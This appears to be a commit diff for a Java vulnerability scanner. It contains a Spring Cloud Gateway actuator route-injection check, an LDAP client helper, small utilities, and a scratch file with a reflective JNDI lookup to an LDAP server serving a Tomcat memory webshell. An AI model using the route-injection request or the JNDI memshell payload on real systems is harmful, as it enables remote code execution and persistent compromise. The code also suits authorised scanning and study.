|
||
public SpringCloudGatewayRCEPOC( ) { | ||
this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName()); | ||
|
||
} | ||
|
||
public boolean hasSpringCloudGatewayRCEPOC(String target) { | ||
String endpoint = "s" + StringRandom.getRandomString(5); | ||
String body = String.format("{\n" + | ||
" \"id\": \"%s\",\n" + | ||
" \"filters\": [{\n" + | ||
" \"name\": \"AddResponseHeader\",\n" + | ||
" \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n" + | ||
" }],\n" + | ||
" \"uri\": \"%s\",\n" + | ||
" \"order\": 0\n" + | ||
"}", endpoint, endpoint, target); | ||
|
||
String re1 = HTTPUtils.postRequestjson(target , "actuator/gateway/routes/" + endpoint, body).toString(); | ||
String re2 = HTTPUtils.postRequestV1(target , "actuator/gateway/refresh").toString(); | ||
String re3 = HTTPUtils.getRequest(target , "actuator/gateway/routes/" + endpoint).toString(); | ||
System.out.println("re1 = " + re1); | ||
System.out.println("re2 = " + re2); | ||
System.out.println("re3 = " + re3); | ||
if (re3.toLowerCase().contains(endpoint.toLowerCase())) { | ||
this.mainController.logTextArea.appendText(Utils.log("存在SpringCloudGatewayRCEPOC漏洞\n")); | ||
return true; | ||
}else { | ||
this.mainController.logTextArea.appendText(Utils.log("不存在SpringCloudGatewayRCEPOC漏洞\n")); | ||
} | ||
HTTPUtils.deleteRequest(target , "actuator/gateway/routes/" + endpoint); | ||
HTTPUtils.postRequestV1(target , "actuator/gateway/refresh"); | ||
return false; | ||
} | ||
|
||
|
||
|
||
|
||
|
||
|
||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
package com.drops.utils; | ||
|
||
/** | ||
* @ClassName: StringRandom | ||
* @Description: TODO | ||
* @Author: Summer | ||
* @Date: 2022/4/17 19:43 | ||
* @Version: v1.0.0 | ||
* @Description: | ||
**/ | ||
public class StringRandom { | ||
|
||
/** | ||
* @Description: 获取随机字符串 | ||
* @Param: [length] | ||
* @return: java.lang.String | ||
* | ||
*/ | ||
public static String getRandomString(int length) { | ||
String base = "abcdefghijklmnopqrstuvwxyz0123456789"; | ||
int size = base.length(); | ||
StringBuilder sb = new StringBuilder(); | ||
for (int i = 0; i < length; i++) { | ||
int number = (int) (Math.random() * size); | ||
sb.append(base.charAt(number)); | ||
} | ||
return sb.toString(); | ||
} | ||
|
||
} |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
/** | ||
* @ClassName: Client | ||
* @Description: TODO | ||
* @Author: Summer | ||
* @Date: 2021/8/2 10:53 | ||
* @Version: v1.0.0 | ||
* @Description: | ||
**/ | ||
import java.io.IOException; | ||
import java.net.Socket; | ||
import java.net.UnknownHostException; | ||
import java.util.Hashtable; | ||
|
||
import javax.naming.Context; | ||
import javax.naming.NamingEnumeration; | ||
import javax.naming.directory.Attribute; | ||
import javax.naming.directory.Attributes; | ||
import javax.naming.directory.DirContext; | ||
import javax.naming.directory.InitialDirContext; | ||
import javax.naming.directory.SearchControls; | ||
import javax.naming.directory.SearchResult; | ||
|
||
public class Client { | ||
// public static void main(String[] args) { | ||
// demo d = new demo(); | ||
// d.setDemo(); | ||
// if (d.isFlag()){ | ||
// System.out.println("sad"); | ||
// } | ||
// } | ||
} | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,170 @@ | ||
/** | ||
* @ClassName: LdapClient | ||
* @Description: TODO | ||
* @Author: Summer | ||
* @Date: 2021/8/2 11:00 | ||
* @Version: v1.0.0 | ||
* @Description: | ||
**/ | ||
import java.util.Properties; | ||
import javax.naming.NamingException; | ||
import javax.naming.NamingEnumeration; | ||
import javax.naming.directory.*; | ||
import javax.naming.ldap.*; | ||
|
||
/** | ||
* Created by baikai on 8/17/16. | ||
*/ | ||
public class LdapClient { | ||
|
||
private String ldapUrl; | ||
private String ldapUserDN; | ||
private String ldapPwd; | ||
|
||
public LdapClient(String ldapUrl, String ldapUserDN, String ldapPwd){ | ||
this.ldapUrl = ldapUrl; | ||
this.ldapUserDN = ldapUserDN; | ||
this.ldapPwd = ldapPwd; | ||
} | ||
|
||
/** | ||
* Create LDAP user | ||
* @param userName | ||
* @param password | ||
* @param uidNumber | ||
* @param gidNumber | ||
*/ | ||
public void createLDAPUser(String userName, String password, String uidNumber, String gidNumber){ | ||
LdapContext context = this.initLDAPContext(); | ||
Attributes matchAttrs = new BasicAttributes(true); | ||
BasicAttribute objclassSet = new BasicAttribute("objectClass"); | ||
objclassSet.add("account"); | ||
objclassSet.add("posixAccount"); | ||
matchAttrs.put(objclassSet); | ||
matchAttrs.put(new BasicAttribute("uid", userName)); | ||
matchAttrs.put(new BasicAttribute("cn", userName)); | ||
matchAttrs.put(new BasicAttribute("uidNumber", uidNumber)); | ||
matchAttrs.put(new BasicAttribute("gidNumber", gidNumber)); | ||
matchAttrs.put(new BasicAttribute("homeDirectory", "/home/" + userName)); | ||
matchAttrs.put(new BasicAttribute("userpassword", password)); | ||
matchAttrs.put(new BasicAttribute("description", "LDAP user.")); | ||
|
||
try { | ||
context.bind("uid=" + userName + ",ou=People,dc=asiainfo,dc=com", null, matchAttrs); | ||
} catch (NamingException e) { | ||
e.printStackTrace(); | ||
}finally { | ||
this.closeLdapContext(context); | ||
} | ||
} | ||
|
||
/** | ||
* Create LDAP user group | ||
* @param groupName | ||
* @param password | ||
* @param gidNumber | ||
*/ | ||
public void createLDAPUserGroup(String groupName, String password, String gidNumber){ | ||
LdapContext context = this.initLDAPContext(); | ||
Attributes matchAttrs = new BasicAttributes(true); | ||
matchAttrs.put(new BasicAttribute("objectclass", "posixGroup")); | ||
matchAttrs.put(new BasicAttribute("cn", groupName)); | ||
matchAttrs.put(new BasicAttribute("gidNumber", gidNumber)); | ||
matchAttrs.put(new BasicAttribute("userPassword", password)); | ||
try { | ||
context.bind("cn=" + groupName + ",ou=People,dc=asiainfo,dc=com", null, matchAttrs); | ||
} catch (NamingException e) { | ||
e.printStackTrace(); | ||
}finally { | ||
this.closeLdapContext(context); | ||
} | ||
} | ||
|
||
/** | ||
* Delete LDAP user | ||
* @param userName | ||
*/ | ||
public void deleteLDAPUser(String userName){ | ||
LdapContext context = this.initLDAPContext(); | ||
try { | ||
context.unbind(userName); | ||
} catch (NamingException e) { | ||
e.printStackTrace(); | ||
}finally { | ||
this.closeLdapContext(context); | ||
} | ||
} | ||
|
||
/** | ||
* Delete LDAP user group | ||
* @param groupName | ||
*/ | ||
public void deleteLDAPUserGroup(String groupName){ | ||
this.deleteLDAPUser(groupName); | ||
} | ||
|
||
/** | ||
* Modify LDAP user attribute with new value | ||
* @param userName | ||
* @param attributeName | ||
* @param attributeNewValue | ||
*/ | ||
public void updateLDAPUserAttribute(String userName, String attributeName, String attributeNewValue){ | ||
LdapContext context = this.initLDAPContext(); | ||
ModificationItem[] mods = new ModificationItem[1]; | ||
mods[0] = new ModificationItem(context.REPLACE_ATTRIBUTE, new BasicAttribute(attributeName, attributeNewValue)); | ||
try{ | ||
context.modifyAttributes(userName, mods); | ||
}catch (NamingException e) { | ||
e.printStackTrace(); | ||
}finally { | ||
this.closeLdapContext(context); | ||
} | ||
} | ||
|
||
/** | ||
* Search LDAP users by user dn and filter | ||
* @param userName | ||
* @param filter | ||
* @return NamingEnumeration<SearchResult> | ||
*/ | ||
public NamingEnumeration<SearchResult> searchLDAPUser(String userName, String filter){ | ||
NamingEnumeration<SearchResult> searchResults = null; | ||
LdapContext context = this.initLDAPContext(); | ||
SearchControls ctrl = new SearchControls(); | ||
ctrl.setSearchScope(SearchControls.SUBTREE_SCOPE); | ||
try { | ||
searchResults = context.search(userName, filter, ctrl); | ||
} catch (NamingException e) { | ||
e.printStackTrace(); | ||
}finally { | ||
this.closeLdapContext(context); | ||
} | ||
return searchResults; | ||
} | ||
|
||
private LdapContext initLDAPContext(){ | ||
LdapContext context = null; | ||
Properties mEnv = new Properties(); | ||
mEnv.put(LdapContext.AUTHORITATIVE, "true"); | ||
mEnv.put(LdapContext.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory"); | ||
mEnv.put(LdapContext.PROVIDER_URL, this.ldapUrl); | ||
mEnv.put(LdapContext.SECURITY_AUTHENTICATION, "simple"); | ||
mEnv.put(LdapContext.SECURITY_PRINCIPAL, this.ldapUserDN); | ||
mEnv.put(LdapContext.SECURITY_CREDENTIALS, this.ldapPwd); | ||
try { | ||
context = new InitialLdapContext(mEnv,null); | ||
} catch (NamingException e) { | ||
e.printStackTrace(); | ||
} | ||
return context; | ||
} | ||
|
||
private void closeLdapContext(LdapContext context){ | ||
try { | ||
context.close(); | ||
} catch (NamingException e) { | ||
e.printStackTrace(); | ||
} | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
import com.drops.utils.StringRandom; | ||
|
||
/** | ||
* @ClassName: gateway | ||
* @Description: TODO | ||
* @Author: Summer | ||
* @Date: 2022/4/17 19:46 | ||
* @Version: v1.0.0 | ||
* @Description: | ||
**/ | ||
public class gateway { | ||
public static void main(String[] args) { | ||
String endpoint = "s" + StringRandom.getRandomString(5); | ||
String body = String.format("{\n" + | ||
" \"id\": \"%s\",\n" + | ||
" \"filters\": [{\n" + | ||
" \"name\": \"AddResponseHeader\",\n" + | ||
" \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n" + | ||
" }],\n" + | ||
" \"uri\": \"http://example.com\",\n" + | ||
" \"order\": 0\n" + | ||
"}", endpoint, endpoint); | ||
|
||
System.out.println(body); | ||
|
||
|
||
String res = "Response Headers: \n" + | ||
" null=[HTTP/1.1 200 OK]\n" + | ||
" Content-Length=[7]\n" + | ||
" Content-Type=[text/html;charset=UTF-8]\n" + | ||
"Response Body: \n" + | ||
" s0gjvh"; | ||
System.out.println(res.contains("s0gjvh")); | ||
|
||
} | ||
|
||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,31 @@ | ||
import javax.naming.InitialContext; | ||
import javax.naming.NamingException; | ||
import java.lang.reflect.InvocationTargetException; | ||
|
||
/** | ||
* @ClassName: spel | ||
* @Description: TODO | ||
* @Author: Summer | ||
* @Date: 2021/8/23 11:39 | ||
* @Version: v1.0.0 | ||
* @Description: | ||
**/ | ||
public class spel { | ||
public static void main(String[] args) { | ||
try { | ||
// javax.naming.InitialContext context = new InitialContext(); | ||
// context.lookup("ldap://127.0.0.1:1389/basic/TomcatMemShell3"); | ||
|
||
java.lang.Class.forName("javax.naming.InitialContext").getMethod("lookup", String.class).invoke(Class.forName("javax.naming.InitialContext").newInstance(),"ldap://127.0.0.1:1389/basic/TomcatMemShell3"); | ||
// new javax.naming.InitialContext().lookup(""); | ||
} catch ( ClassNotFoundException | NoSuchMethodException e) { | ||
e.printStackTrace(); | ||
} catch (InvocationTargetException e) { | ||
e.printStackTrace(); | ||
} catch (IllegalAccessException e) { | ||
e.printStackTrace(); | ||
} catch (InstantiationException e) { | ||
e.printStackTrace(); | ||
} | ||
} | ||
} |